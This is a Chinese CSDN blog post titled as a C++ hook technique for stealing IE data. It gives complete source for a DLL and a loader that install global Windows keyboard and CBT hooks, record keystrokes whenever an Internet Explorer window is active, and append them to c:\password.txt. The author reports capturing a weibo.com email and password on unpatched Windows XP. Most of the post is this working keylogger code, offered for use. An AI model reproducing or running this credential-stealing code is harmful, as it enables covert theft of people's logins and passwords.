C++钩子技术窃取IE数据

最新推荐文章于 2015-03-29 22:21:00 发布
最新推荐文章于 2015-03-29 22:21:00 发布
阅读量1.6k 收藏
点赞数
分类专栏: VS2010 hook C++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/9428877
版权
VS2010 同时被 3 个专栏收录
61 篇文章 0 订阅
订阅专栏
C++
53 篇文章 0 订阅
订阅专栏
hook
3 篇文章 0 订阅
订阅专栏

先生成dll

ktr.h代码:

#ifndef KTR_H
#define KTR_H
#include <Windows.h>

extern "C" void __declspec(dllexport) SetKbHook();
extern "C" void __declspec(dllexport) RemoveKbHook();

#endif

ktr.cpp: 

#include "ktr.h"
#include <stdio.h>
#include <process.h>
#define	CHARNUM		5
#define	TXTLENGTH	10
//定义生成的密码保存位置
#define	PLACEOFFILE	"c:\\password.txt"
static BOOL bHooked = FALSE;
static BOOL IE_is_active = FALSE;
static HHOOK hhook = 0, hhookMsg = 0;
static HINSTANCE hInst;
static int count;
static char tomb[CHARNUM];
static FILE *stream;
static int shift = 32;
short flag;
enum NUM {
	SHIFT, CONTROL, ALT, CAPITAL
};
static int condition[CHARNUM][CAPITAL + 1];
static TCHAR text[TXTLENGTH];
void Initcondition(void);
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam);
LRESULT CALLBACK CBTProc(int code, WPARAM wParam, LPARAM lParam);
//DLL 动态链接库入口
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
	switch (fdwReason) {
	case DLL_PROCESS_ATTACH:
		hInst = hinstDLL;
		Initcondition();
		count = 0;
		break;
	case DLL_THREAD_ATTACH:
		break;
	case DLL_THREAD_DETACH:
		break;
	case DLL_PROCESS_DETACH:
		break;
	default:
		break;
	}
	return TRUE;
}
//安装全局钩子,
void __declspec(dllexport) SetKbHook() {
	if (!bHooked) {
		hhook = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC) KeyboardProc, hInst,
				(DWORD)NULL);
		hhookMsg = SetWindowsHookEx(WH_CBT, (HOOKPROC) CBTProc, hInst,
				(DWORD)NULL);
		bHooked = TRUE;
	}
}
//实现钩子卸载函数
void __declspec(dllexport) RemoveKbHook() {
	if (bHooked)
		UnhookWindowsHookEx(hhook);
}
//定义钩子函数
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam) {
	int i, temp;
	int flag_shift;
	int flag_capital;
	int flag_alt;
	int flag_control;

	if (IE_is_active) {
		if ((wParam == VK_SHIFT) || (wParam == VK_CAPITAL) || (wParam == VK_MENU) || (wParam == VK_CONTROL)) {
			flag_shift = 0x8000 & GetKeyState(VK_SHIFT);
			flag_capital = 0x0001 & GetKeyState(VK_CAPITAL);
			flag_alt = 0x8000 & GetKeyState(VK_MENU);
			flag_control = 0x8000 & GetKeyState(VK_CONTROL);
		}
		if (wParam != VK_TAB && wParam != VK_ESCAPE && wParam != VK_LEFT && wParam != VK_RIGHT && wParam != VK_UP && wParam != VK_DOWN && wParam != VK_END && wParam != VK_HOME && wParam != VK_PRIOR && wParam != VK_NEXT && wParam != VK_INSERT && wParam != VK_NUMLOCK && wParam != VK_SCROLL && wParam != VK_PAUSE && wParam != VK_LWIN && wParam != VK_RWIN && wParam != VK_F1 && wParam != VK_F2 && wParam != VK_F3 && wParam != VK_F4 && wParam != VK_F5 && wParam != VK_F6 && wParam != VK_F7 && wParam != VK_F8 && wParam != VK_F9 && wParam != VK_F10 && wParam != VK_F11 && wParam != VK_F12) {
			if ((0x80000000 & lParam) == 0)	//WM_KEYDOWN?
			{
				if (wParam >= 0x41 && wParam <= 0x5a)
					wParam += 32;					 //Kisbeture konvertalas
				if (wParam == VK_SHIFT || wParam == VK_CONTROL || wParam == VK_MENU || wParam == VK_CAPITAL) {
					if (wParam == VK_CAPITAL)
						temp = 1;
					else
						temp = 0;
					condition[count][wParam - 16 - temp] = 1;
				}
				tomb[count] = wParam;
				count++;
			} else								//WM_KEYUP?
			if (wParam == VK_SHIFT || wParam == VK_CONTROL || wParam == VK_MENU || wParam == VK_CAPITAL) {
				if (wParam == VK_CAPITAL)
					temp = 1;
				else
					temp = 0;
				condition[count][wParam - 16 - temp] = 2;
				tomb[count] = wParam;
				count++;
			}
			if (count == CHARNUM) {
				stream = fopen(PLACEOFFILE, "a+");

				for (i = 0; i < count; i++) {
					switch (tomb[i]) {
					case VK_DELETE:
						fprintf(stream, "%s", "<d>");
						break;

					case VK_RETURN:
						fprintf(stream, "%s", "\n");
						break;

					case VK_BACK:
						fprintf(stream, "%s", "<b>");
						break;

					case VK_SHIFT:
						if (condition[i][SHIFT] == 1)
							fprintf(stream, "%s", "<sd>");
						else
							fprintf(stream, "%s", "<su>");
						break;

					case VK_CONTROL:
						if (condition[i][CONTROL] == 1)
							fprintf(stream, "%s", "<ctd>");
						else
							fprintf(stream, "%s", "<ctu>");
						break;

					case VK_MENU:
						if (condition[i][ALT] == 1)
							fprintf(stream, "%s", "<ad>");
						else
							fprintf(stream, "%s", "<au>");
						break;

					case VK_CAPITAL:
						if (condition[i][CAPITAL] == 1)
							fprintf(stream, "%s", "<cpd>");
						else
							fprintf(stream, "%s", "<cpu>");
						break;

					default:
						fprintf(stream, "%c", tomb[i]);
						break;
					}
				}
				fclose(stream);
				count = 0;
				Initcondition();
			}
		}
	}
	return CallNextHookEx(hhook, code, wParam, lParam);
}

void Initcondition() {
	int i, j;
	for (i = 0; i < CHARNUM; i++)
		for (j = 0; j < CAPITAL + 1; j++)
			condition[i][j] = 0;
}
//判断IE是否被激活
LRESULT CALLBACK CBTProc(int code, WPARAM wParam, LPARAM lParam) {
	if (code == HCBT_ACTIVATE) {
		GetClassName((HWND) wParam, text, TXTLENGTH);
		if (text[0] == 'I' && text[1] == 'E')//Class name of Internet-Explorer begins with IE
			IE_is_active = TRUE;
		else
			IE_is_active = FALSE;
	}
	return CallNextHookEx(hhookMsg, code, wParam, lParam);
}

调用dll的cpp: 

#include "..\ktr\ktr.h"
//win 函数入口
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
		LPSTR lpszCmdLine, int nCmdShow)
{
	MSG msg;
	TCHAR text[] = L"Error loading DLL!";
	TCHAR title[] = L"Key Tracer";
	BOOL error=FALSE;
	HINSTANCE dllhinst;
//创建安装钩子函数指针,用来记录dll中安装钩子的地址
	typedef VOID (CALLBACK* LPFNDLLFUNC1)();
	LPFNDLLFUNC1 lpfnDllFunc1;
//加载钩子dll
	TCHAR dllPath[] = L"ktr.dll";
	dllhinst=LoadLibrary(dllPath);
//判断是否加载dll成功
	if (dllhinst!=NULL)
	{
		lpfnDllFunc1=(LPFNDLLFUNC1)GetProcAddress(dllhinst, "SetKbHook");
		if (!lpfnDllFunc1)
		{
			FreeLibrary(dllhinst);
			error=TRUE;
		}
		else
		{
			lpfnDllFunc1();
		}
	}
	else {
		error=TRUE;
	}

	if (error) {
		MessageBox(GetDesktopWindow(),text,title, MB_OK);
		ExitProcess(1);
	}

	while (GetMessage(&msg,0,0,0))
	{	
		TranslateMessage(&msg);
		DispatchMessage(&msg);
	}

	return msg.wParam;
}

准备一台没有打任何补丁的虚拟机XP,把生成的dll和exe放在同一个目录,然后运行exe,没有界面的,但是能在任务管理器中看到。

打开IE,输入http://weibo.com/,然后输入自己的邮箱和密码,然后看看C盘,就看到生成了password.txt。

在IE6、7、8上都测试过,成功。

但是,对于打了最新补丁的XP,就不能了。

feier7501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTML5中的meta标签 和 IE浏览器能识别的钩子
不忘初心,才能始终
03-22 1637
一、meta 标签的使用 1. 使用描述 description属性 增加点击率 2. 设置字符集 3. 重定向和定时刷新功能 4.设备宽度自适应(针对移动设备) content 参数: width     viewport 宽度(数值/device-width) height viewport 高度(数值/device-heig
钩子,hook来获取消息
06-08
\ 钩子获取windows消息
hook ie浏览器
11-02
用easyhook库修改IE浏览器api,获取用户浏览信息,并根据浏览信息进行分析,结果存放httplog.txt中
IE中的鼠标钩子
赖皮的网上温暖小窝
03-23 1078
有机会再研究了。好像蛮有意思的。http://www.codeproject.com/com/MouseProcThunk.asp
各种奇妙的hack
weixin_34352005的博客
03-29 269
Android Selector Hacks WebKit .selector:not(*:root) {} Chrome * Safari * Opera ≥ 14 Android * # JavaScript Hacks var isChromium = !!window.chrome; Chrome * Ope...
两分钟用C#搭建IE BHO勾子,窃取密码
lee576的专栏
10-11 2542
如果图片无法显示. 请访问 http://www.horizonideas.com/writings/article.php?id=12授权CSDN, 请在征求同意后转载. 作者: 陈嘉, NetSecure Inc, Canada, 软件工程师微软在1997年正式退出Browser Helper Object (BHO), 使程序员能够更好的对IE进行二次开发和操作. 在通过编写BHO
c++钩子技术实现文件监控
01-24
总的来说,利用C++钩子技术和Windows API,我们可以构建高效且灵活的文件监控系统,这对于日志跟踪、数据备份、安全审计等应用场景非常有用。理解并熟练掌握这一技术,对于提升你的系统编程技能大有裨益。
c++钩子函数:copy hook_linux函数hook
12-27
在IT领域,钩子函数(Hook Function)是一种高级技术,常用于系统监控、调试和拦截特定事件。在C++编程中,我们可以利用钩子来跟踪和控制程序的行为,例如在这个场景下,我们关注的是文件复制操作。"copy hook"特指...
C++钩子模仿按键精灵屏幕录制
03-24
在这个场景下,“C++钩子模仿按键精灵屏幕录制”是指使用C++编程技术来创建一个类似于按键精灵的工具,该工具可以记录并回放用户的屏幕活动和键盘输入。 首先,我们需要理解什么是钩子。在Windows API中,钩子...
动态监视IE并修改显示内容
06-24
C++写的修改IE内容的动态库,Vb写的动态监视IE,VB写的exe调用DLL。如果有更好的办法请联系我,谢谢。
浅谈c++ hook 钩子的使用介绍
08-28
"浅谈c++ hook 钩子的使用介绍" 本篇文章主要介绍了c++ hook 钩子的使用介绍,详细的介绍了c++ ...c++ hook 钩子是一个非常强大的技术,可以帮助开发者截获和处理window消息或特定事件,从而实现一些非常有趣的功能。
c++键盘钩子代码及工程配置
06-13
C++编程中,键盘钩子是一种用于监控和处理键盘输入的技术。通过设置键盘钩子,开发者可以捕获并处理系统中的键盘事件,实现诸如输入拦截、热键绑定等功能。本文将详细介绍如何在C++环境下配置键盘钩子,并解决调试...
MFC处理F1~F10的消息
wwwcs59的专栏
09-22 2107
if (pMsg->message == WM_KEYDOWN)   {      if (pMsg->wParam == VK_F1)    {     return TRUE;    }    else if (pMsg->wParam == VK_F2)    {     return TRUE;    }    else if (pMsg->wParam == VK_F3)    {   
java程序获取服务器响应报文
xanxus46的专栏
09-16 1万+
如果我们想得到当前主机与远程主机是否连接,或者我们想做一个小型浏览器,我们需要使用socket写一个请求报文。废话少说,上代码。 public class Main { /** * @param args */ public static void main(String[] args) { // TODO Auto-generated method stub Socke
regsvr32找不到指定的模块
热门推荐
天元喜羊羊的博客
09-07 3万+
--------------------------- RegSvr32 --------------------------- LoadLibrary("HelloWorld.dll") 失败 - 找不到指定的模块。 --------------------------- 确定 --------------------------- 找到VC6的目录,进入C:\Program
c++ 如何利用钩子处理串口数据demo
最新发布
06-08
以下是一个基本的示例代码,演示如何使用钩子处理串口数据: ```c++ #include #include HHOOK hHook; LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam); int main() { // 设置钩子 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值